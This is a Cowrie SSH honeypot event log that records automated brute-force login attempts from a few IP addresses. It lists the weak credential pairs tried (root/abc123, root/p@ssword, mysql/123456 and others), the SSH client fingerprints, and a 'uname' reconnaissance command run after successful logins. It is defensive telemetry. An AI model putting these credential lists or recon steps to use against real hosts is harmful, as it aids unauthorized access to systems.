{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:59.917994Z","src_ip":"212.227.125.160","session":"7a713fd063ce"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:59.919078Z","src_ip":"212.227.125.160","session":"7a713fd063ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48898,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8bbd912bcec","protocol":"ssh","message":"New connection: 212.227.125.160:48898 (1.2.3.4:22) [session: a8bbd912bcec]","sensor":"my-vps","timestamp":"2025-08-31T00:39:09.563076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:39:09.564128Z","src_ip":"212.227.125.160","session":"a8bbd912bcec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:39:09.637459Z","src_ip":"212.227.125.160","session":"a8bbd912bcec"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:39:10.010274Z","src_ip":"212.227.125.160","session":"a8bbd912bcec"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:11.130506Z","src_ip":"212.227.125.160","session":"a8bbd912bcec"}
{"eventid":"cowrie.session.closed","duration":59.988956689834595,"message":"Connection lost after 59 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:13.204538Z","src_ip":"57.129.64.219","session":"3e133fa09ffe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60982,"dst_ip":"1.2.3.4","dst_port":22,"session":"517c4505d17d","protocol":"ssh","message":"New connection: 212.227.235.229:60982 (1.2.3.4:22) [session: 517c4505d17d]","sensor":"my-vps","timestamp":"2025-08-31T00:39:19.869838Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50612,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff02697558fd","protocol":"ssh","message":"New connection: 212.227.125.160:50612 (1.2.3.4:22) [session: ff02697558fd]","sensor":"my-vps","timestamp":"2025-08-31T00:39:19.994920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.007100Z","src_ip":"212.227.125.160","session":"ff02697558fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.068892Z","src_ip":"212.227.125.160","session":"ff02697558fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55356,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ec4a6f6f381","protocol":"ssh","message":"New connection: 212.227.235.229:55356 (1.2.3.4:22) [session: 9ec4a6f6f381]","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.111926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.112586Z","src_ip":"212.227.235.229","session":"9ec4a6f6f381"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.413415Z","src_ip":"212.227.235.229","session":"9ec4a6f6f381"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.462458Z","src_ip":"212.227.125.160","session":"ff02697558fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:39:20.704666Z","src_ip":"212.227.125.160","session":"ff02697558fd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.705401Z","src_ip":"212.227.125.160","session":"ff02697558fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.780679Z","src_ip":"212.227.125.160","session":"ff02697558fd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.781850Z","src_ip":"212.227.125.160","session":"ff02697558fd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.796141Z","src_ip":"212.227.235.229","session":"517c4505d17d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:39:20.796702Z","src_ip":"212.227.235.229","session":"517c4505d17d"}
{"eventid":"cowrie.login.failed","username":"pdv","password":"123","message":"login attempt [pdv/123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:39:21.659017Z","src_ip":"212.227.235.229","session":"9ec4a6f6f381"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:22.963377Z","src_ip":"212.227.235.229","session":"9ec4a6f6f381"}
{"eventid":"cowrie.login.failed","username":"backup","password":"welcome","message":"login attempt [backup/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T00:39:26.503180Z","src_ip":"212.227.235.229","session":"517c4505d17d"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:28.367793Z","src_ip":"212.227.235.229","session":"517c4505d17d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39860,"dst_ip":"1.2.3.4","dst_port":22,"session":"525012ac2d7d","protocol":"ssh","message":"New connection: 212.227.125.160:39860 (1.2.3.4:22) [session: 525012ac2d7d]","sensor":"my-vps","timestamp":"2025-08-31T00:39:30.504717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:39:30.505619Z","src_ip":"212.227.125.160","session":"525012ac2d7d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:39:30.578633Z","src_ip":"212.227.125.160","session":"525012ac2d7d"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:39:30.862238Z","src_ip":"212.227.125.160","session":"525012ac2d7d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:32.037444Z","src_ip":"212.227.125.160","session":"525012ac2d7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40262,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0e92937f8b1","protocol":"ssh","message":"New connection: 212.227.125.160:40262 (1.2.3.4:22) [session: e0e92937f8b1]","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.021444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.022518Z","src_ip":"212.227.125.160","session":"e0e92937f8b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.096833Z","src_ip":"212.227.125.160","session":"e0e92937f8b1"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.321349Z","src_ip":"212.227.125.160","session":"e0e92937f8b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:39:41.667026Z","src_ip":"212.227.125.160","session":"e0e92937f8b1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.667995Z","src_ip":"212.227.125.160","session":"e0e92937f8b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.743360Z","src_ip":"212.227.125.160","session":"e0e92937f8b1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.744383Z","src_ip":"212.227.125.160","session":"e0e92937f8b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52068,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd51653fe6d0","protocol":"ssh","message":"New connection: 212.227.125.160:52068 (1.2.3.4:22) [session: fd51653fe6d0]","sensor":"my-vps","timestamp":"2025-08-31T00:39:41.915529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:39:42.468235Z","src_ip":"212.227.125.160","session":"fd51653fe6d0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:39:42.469049Z","src_ip":"212.227.125.160","session":"fd51653fe6d0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"welcome","message":"login attempt [backup/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T00:39:44.809760Z","src_ip":"212.227.125.160","session":"fd51653fe6d0"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:46.455448Z","src_ip":"212.227.125.160","session":"fd51653fe6d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38680,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eec30326c77","protocol":"ssh","message":"New connection: 212.227.125.160:38680 (1.2.3.4:22) [session: 7eec30326c77]","sensor":"my-vps","timestamp":"2025-08-31T00:39:51.420645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:39:51.421347Z","src_ip":"212.227.125.160","session":"7eec30326c77"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:39:51.495512Z","src_ip":"212.227.125.160","session":"7eec30326c77"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:39:51.724010Z","src_ip":"212.227.125.160","session":"7eec30326c77"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:39:52.878291Z","src_ip":"212.227.125.160","session":"7eec30326c77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56346,"dst_ip":"1.2.3.4","dst_port":22,"session":"0430bf099475","protocol":"ssh","message":"New connection: 212.227.125.160:56346 (1.2.3.4:22) [session: 0430bf099475]","sensor":"my-vps","timestamp":"2025-08-31T00:40:01.793513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:01.801877Z","src_ip":"212.227.125.160","session":"0430bf099475"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:40:01.870546Z","src_ip":"212.227.125.160","session":"0430bf099475"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:40:02.275068Z","src_ip":"212.227.125.160","session":"0430bf099475"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:40:03.043666Z","src_ip":"212.227.125.160","session":"0430bf099475"}
